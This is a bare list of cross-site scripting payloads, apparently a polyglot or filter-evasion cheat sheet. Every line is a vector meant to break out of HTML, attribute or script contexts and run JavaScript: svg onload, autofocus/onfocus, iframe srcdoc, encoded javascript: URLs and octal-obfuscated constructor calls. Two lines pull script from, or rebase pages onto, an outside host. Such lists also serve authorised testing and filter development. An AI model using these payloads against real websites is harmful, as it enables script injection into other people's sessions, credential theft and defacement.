"><svg/onload=alert(/1/)>
</script><script>a lert(/1/)</script>
<!'/*!"/*!\'/*\"/*--!><Input/Autofocus/%0D*/Onfocus=confirm%601%60//><Svg>
"--!><Svg/Onload=confirm`1`>"
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm`1`>
'"--!><Script /K/>confirm`1`//</Script /K/><!--
'"--!><Image%0CSrcset=.%0COnerror=confirm%601%60 //
'"--!>%25%75003CSvg /%25%753008Svg /%25%75FF1CSvg /Onload=confirm`1` //
'" /Autof<K>ocus /O<K>nfocus=confirm`1` //
'"--!><Body /Onpageshow=confirm`1`>
'"--!><Svg><Set /Onbegin=confirm`1`>
"'--!><Html/Onmouseenter=confirm`1`//>"
'" /Style=position:fixed;top:0;left:0;font-size:999px; /Onmouseenter=confirm`1` //
'"--!><K /Onbeforescriptexecute=confirm`1` //
'"--!><Svg><Script /Xlink:Href=https:@knoxss.me/1 /> 
'"--!><Object /Data=JavaS%26%2399ript:confirm`1`>
'"--!></Iframe><Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;>
'"--!><Base /Href=https:@knoxss.me>
<!'/*!"/*\'/*\"/**/-top[`con\x66irm`]`1`//><svg>
<!'/*!"/*\'/*\"/**/-[location=`Javas\x63ript:confirm%25281%2529`]//><svg>
<!'/*!"/*\'/*\"/**/-[][`\146\151\154\164\145\162`][`\143\157\156\163\164\162\165\143\164\157\162`](`\143\157\156\146\151\162\155\50\61\51`)()//><svg>
<!'/*!"/*\'/*\"/**/-confirm`1`,//><svg>
<!'/*!"/*\'/*\"/**/-confirm`1`};//><svg>
"-confirm(/1/)-"
<!'/*!"/*\'/*\"/**/}confirm`1`;k:{//><svg>
<!'/*!"/*\'/*\"/**/}confirm`1`?0:function k(){//><svg>
